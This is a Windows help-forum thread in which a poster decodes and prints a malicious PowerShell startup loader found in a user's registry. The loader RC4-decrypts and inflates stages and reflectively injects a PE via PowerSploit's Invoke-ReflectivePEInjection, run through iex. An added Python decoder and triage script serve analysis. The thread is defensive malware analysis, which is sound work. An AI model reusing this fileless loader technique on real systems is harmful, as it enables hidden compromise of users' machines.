Windows 7 Forums


Windows 7: PowerShell starts with Windows, can't disable it from msconfig.exe

02 Oct 2015   #11
YUNoCake

Windows 7 Ultimate 64bit

Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.


02 Oct 2015   #12
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64

Whatever works for you 'salright I guess. At least run a scan with MBAM... RogueKiller finds all kinds of stuff too.
03 Oct 2015   #13
ICIT2LOL

Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10

My two cents' worth: run this through the machine, Download Kaspersky Rescue Disk 10. It needs to have a bootable disk made and the BIOS set to boot from the disk or stick that the program is on.

For what it is worth, I never go "looking" for malware for any reason; it simply is contra to anything we are always reading about, and in my mind the only malware that one could use for any purpose would have to be well known, and it also carries the possibility of passing it on to others through whatever one does on their machine, and that includes somewhere like this forum.

03 Oct 2015   #14
UsernameIssues

W7 Pro SP1 64bit

Quote: Originally Posted by YUNoCake
Well I have finally found a workaround. I had to get the ownership of the powershell folder, delete the .exe and then I was able to remove that startup item. Thank you anyway and hope someone will find this info useful sometime.
There are many Windows scheduled tasks that run PowerShell scripts. These will probably fail now that you deleted the exe for PowerShell.
03 Oct 2015   #15
Pyprohly

Windows 10, Windows 8.1 Pro, Windows 7 Professional, OS X El Capitan

Quote: Originally Posted by YUNoCake
I have just tried your command but gave me this error
Oops, sorry, not sure how a colon slipped through. Actually, colons after registry hive names is how you’d reference a registry path in PowerShell. All this PowerShell talk is confusing me. The corrected Command Prompt command is,
Code:
reg query "HKCU\Software\Classes\FYTNHRWPQH" /v "GAZADSLU"
But never mind that, you’ve managed to post the string that that registry value contained in one piece. And behold, it decodes to the following script, (which is a bit long. Lobbed a few lines off),
Code:
# Name of the registry key under HKCU\Software\Classes where the stages are stored
$MEVCSVYQHEFEAP = 'FYTNHRWPQH';
# Value names holding the 64-bit and 32-bit payloads respectively (see the [IntPtr]::Size check below)
$FMgcWUTxuAUGpoG = '{76DA0B7A-7C82-469A-AA3B-FABB6FD1AE48}';
$HLpEpbsbTddkuXUoMf = '{92624DF7-3330-41AD-A818-7B33982D7FCE}';
# RC4: key schedule over a 256-byte state, then keystream XOR over the input bytes
Function YYNIMJPQCCKGZQU{
	Param([Parameter( Position = 0, Mandatory = $true )][Byte[]]$QWtCWDrqWbRTuX,[Parameter(Position = 1, Mandatory = $true)][Byte[]]$ENKLQLMMOW)
	[Byte[]]$k = New-Object Byte[] 256;
	[Byte[]]$s = New-Object Byte[] 256;
	for ($i = 0; $i -lt 256; $i++){
		$s[$i] = [Byte]$i;
		$k[$i] = $ENKLQLMMOW[$i % $ENKLQLMMOW.Length];
	}
	$p = 0;
	for ($i = 0; $i -lt 256; $i++){
		$p = ($p + $s[$i] + $k[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
	}
	$i = 0;$p = 0;
	for ($c = 0; $c -lt $QWtCWDrqWbRTuX.Length; $c++){
		$i = ($i + 1) % 256;
		$p = ($p + $s[$i]) % 256;
		$s[$i],$s[$p] = $s[$p],$s[$i];
		[int]$m = ($s[$i] + $s[$p]) % 256;
		$QWtCWDrqWbRTuX[$c] = $QWtCWDrqWbRTuX[$c] -bxor $s[$m];
	}
	return $QWtCWDrqWbRTuX;
}
# gzip-decompress a byte array and return the result as text
Function inflatebin{
	Param([Parameter( Position = 0, Mandatory = $true )]$QWtCWDrqWbRTuX)
	$memstream = New-Object System.IO.MemoryStream;
	$memstream.Write($QWtCWDrqWbRTuX, 0, $QWtCWDrqWbRTuX.Length);
	$memstream.Seek(0,0) | Out-Null;
	$gzstream = New-Object System.IO.Compression.GZipStream($memstream,[IO.Compression.CompressionMode]::Decompress);
	$reader = New-Object System.IO.StreamReader($gzstream);
	$QWtCWDrqWbRTuX = $reader.ReadToEnd();
	$reader.close();
	return $QWtCWDrqWbRTuX;
}
# RC4 key shared by both stages
$qusQlVRMRdHEGECLL = [System.Text.Encoding]::ASCII.GetBytes('qkct9qPltyPEVxqdVz');
$SkVuQXvIFYKqfzFWFOMV = [System.Convert]::FromBase64String('+ncnYXTMbk4BqVTULbs92y3VO+DdkwnGz3xKwA7rs/G46H2o63lNDqQdZtg9zPMOEx4oH5PMsyk+ZU5pUzhRFv2GrjnCdjYf9vnpyasCicjQkIBCvKpm3rWq3uY2aQMDWxi9YTaFbLY770ty5yXeMaHymO3F7UdEKu4ji1QKYA33Xu1afVfALLXOwBpOhZL28Ww9CtLUHkagUzzIpbq1HcnxHuJjORbu5MX+lGLsytfgnsskenFKnWG36AeLBKf9tt9eiGVotIfPMuR7xlC7IU8QKhMX7sP2LnbqhhlhmzmQePXt9hsyotNL76G5mSZap4oVLPp6zBN41dF
[... ... ...]
SgoDiWDpZyXi1sOTK2crN8twGGABJQkvO2AWPtswIYO+1mcMsyqD8eY33O5dpZh+NK3PpUPyn4cNx4hQ8IanBUZMPMIxx6FxUQyVxQiLgJN7RtstQ+YQJOi1y2bf81kyBeLiqxONXOF24cTvZ0U23n+d4gdhYR3XpgmVIikOZuNKDAXLM0mJxTTzEfCAhXU8S/5MMx1FZle6JjS47sJ3wXrMYCk/gOcqNQqrDxWw0IojQUQnmASez4bWSbAPOjO0tGRZFxnzEhf0Amq1I0uaw');
# Stage 1: base64 -> RC4 -> gzip yields a PowerShell script held only in memory
$SkVuQXvIFYKqfzFWFOMV = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV -ENKLQLMMOW $qusQlVRMRdHEGECLL
$SkVuQXvIFYKqfzFWFOMV = inflatebin -QWtCWDrqWbRTuX $SkVuQXvIFYKqfzFWFOMV

# Stage 2: read the RC4-encrypted PE from the registry, choosing the value that matches the process bitness
$PRIMNMSFSZY = 'HKCU:\Software\Classes\' + $MEVCSVYQHEFEAP;
$JMQJRCFCXMMNCDMDKDI = '';
if ([IntPtr]::Size -eq 8) {
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $FMgcWUTxuAUGpoG).$FMgcWUTxuAUGpoG;
}else{
	$JMQJRCFCXMMNCDMDKDI = (Get-ItemProperty -Path $PRIMNMSFSZY -Name $HLpEpbsbTddkuXUoMf).$HLpEpbsbTddkuXUoMf;
}
$JMQJRCFCXMMNCDMDKDI = YYNIMJPQCCKGZQU -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI -ENKLQLMMOW $qusQlVRMRdHEGECLL
#$JMQJRCFCXMMNCDMDKDI = inflatebin2 -QWtCWDrqWbRTuX $JMQJRCFCXMMNCDMDKDI

# Append a call that loads the decrypted PE reflectively, then execute the assembled script with iex (nothing touches disk)
$SkVuQXvIFYKqfzFWFOMV = $SkVuQXvIFYKqfzFWFOMV + 'Invoke-ReflectivePEInjection -PEBytes $JMQJRCFCXMMNCDMDKDI;'
iex $SkVuQXvIFYKqfzFWFOMV;
At a glance, there is not much that can be gathered; it’s almost as obfuscated as it was encoded… But there is one clue in the script that will tell us if it lives for good or evil. On line 53, the second last line of the script, a particular cmdlet is mentioned within a string—Invoke-ReflectivePEInjection—and this cmdlet does not exist in any standard builtin PowerShell module. Let’s give it a Google now…

Okay, first link brings us to this GitHub page. Invoke-ReflectivePEInjection appears to be part of a module called CodeExecution, which is included in a library of modules called PowerSploit. A PowerShellMagazine article explains what PowerSploit is and what it's capable of doing:
Quote:
PowerSploit is an offensive security framework for penetration testers and reverse engineers. It was born out of the realization that PowerShell was the ideal post-exploitation utility in Windows due to its ability to perform a wide range of administrative and low-level tasks all without the need to drop malicious executables to disk, thus, evading antivirus products with ease.
The PowerSploit GitHub repository offers a briefing of what CodeExecution's Invoke-ReflectivePEInjection cmdlet does:
Quote:
Injects a Dll into the process ID of your choosing
And some further insight obtained from this other website:
Quote:
Invoke-ReflectivePEInjection is a PowerShell script which can reflectively load and execute a windows PE file such as an EXE or DLL inside the PowerShell process on a remote computer without writing to disk. This is accomplished by (partially) rewriting the Win32 functionality which loads EXEs/DLLs in PowerShell.
Lastly, it's worth mentioning, Clymb3r, the author of PowerSploit according to the GitHub repository, has a WordPress blog where he shows off his "hacking and general mayhem" techniques.

Also, in YUNoCake's startup script, the Invoke-ReflectivePEInjection cmdlet uses the 'PEBytes' parameter, which was added 8 months ago, so YUNoCake's acquired script must have been a fairly recent build.
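Added example, not code from the thread or from any of its posters: a Python decoder an analyst could use to unpack a blob packaged the way Pyprohly's decoded script does it (base64, then RC4 with the key the script carries, then gzip) and to flag the tokens the post points at as the clue, the Invoke-ReflectivePEInjection cmdlet name and the final iex. The rc4 function mirrors the script's YYNIMJPQCCKGZQU function and is plain RC4 (it reproduces the standard "Key"/"Plaintext" test vector). The key string is the one from the decoded script; the blob it is run on is constructed here so the decoder can be exercised offline, and the token list, the function names and encode_stage are assumptions of this example.

```python
import base64
import gzip
import re

# Key taken from the decoded script in the post above ($qusQlVRMRdHEGECLL).
SAMPLE_KEY = "qkct9qPltyPEVxqdVz"

# Tokens an analyst would look for in decoded output. The first two are the
# clue the post itself points at; the rest are assumptions of this example.
SUSPICIOUS_TOKENS = [
    "Invoke-ReflectivePEInjection",
    "iex",
    "Invoke-Expression",
    "FromBase64String",
    "HKCU:\\Software\\Classes",
]


def rc4(data: bytes, key: bytes) -> bytes:
    """RC4 as implemented by the script's YYNIMJPQCCKGZQU function:
    key schedule over a 256-byte state, then keystream XOR. RC4 is symmetric,
    so one function both encrypts and decrypts."""
    s = list(range(256))
    k = [key[i % len(key)] for i in range(256)]
    p = 0
    for i in range(256):
        p = (p + s[i] + k[i]) % 256
        s[i], s[p] = s[p], s[i]
    out = bytearray()
    i = p = 0
    for c in data:
        i = (i + 1) % 256
        p = (p + s[i]) % 256
        s[i], s[p] = s[p], s[i]
        out.append(c ^ s[(s[i] + s[p]) % 256])
    return bytes(out)


def decode_stage(b64_blob: str, key: str) -> str:
    """Base64 -> RC4 -> gzip: the three steps the script applies to
    $SkVuQXvIFYKqfzFWFOMV before handing the result to iex."""
    raw = base64.b64decode(b64_blob)
    plain = rc4(raw, key.encode("ascii"))
    return gzip.decompress(plain).decode("utf-8", errors="replace")


def triage(script_text: str) -> list:
    """Return the suspicious tokens present in a decoded script. Matching is
    whole-token and case-insensitive, which is how PowerShell treats names."""
    hits = []
    for token in SUSPICIOUS_TOKENS:
        pattern = r"(?<![\w-])" + re.escape(token) + r"(?![\w-])"
        if re.search(pattern, script_text, re.IGNORECASE):
            hits.append(token)
    return hits


def encode_stage(script_text: str, key: str) -> str:
    """Inverse of decode_stage. Used only to build a constructed sample so the
    decoder can be tested without any real payload (hypothetical helper)."""
    packed = rc4(gzip.compress(script_text.encode("utf-8")), key.encode("ascii"))
    return base64.b64encode(packed).decode("ascii")


# Constructed stand-in for the blob stored in the registry value. It is not the
# payload from the thread; it only reproduces the packaging.
CONSTRUCTED_SCRIPT = (
    "Write-Output 'constructed sample, not the real payload';\n"
    "$stage = 'Invoke-ReflectivePEInjection -PEBytes $bytes;';\n"
    "iex $stage;\n"
)
CONSTRUCTED_BLOB = encode_stage(CONSTRUCTED_SCRIPT, SAMPLE_KEY)


if __name__ == "__main__":
    decoded = decode_stage(CONSTRUCTED_BLOB, SAMPLE_KEY)
    print(decoded)
    print("suspicious tokens:", triage(decoded))
```

To use it on a real sample, copy the base64 string out of the registry value (the reg query command earlier in the thread prints it) into decode_stage together with the key the stage-1 script embeds; if the decoded text comes back empty or gzip raises, the key or the value was wrong, which is itself a useful signal that the two stages do not belong together. Running triage over the result gives a quick answer to the "good or evil" question the post asks before any deeper reverse engineering.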
03 Oct 2015   #16
Layback Bear

Windows 7 Pro. 64/SP-1

Very well done research Pyprohly!
04 Oct 2015   #17
ICIT2LOL

Desk1 7 Home Prem / Desk2 10 Pro / Main lap Asus ROG 10 Pro 2 laptop Toshiba 7 Pro Asus P2520 7 & 10

Quote: Originally Posted by Layback Bear
Very well done research Pyprohly!
That P that stuff might as well be in Klingon to me (most of it is LOL!!) - seriously am impressed and if I could rep you I would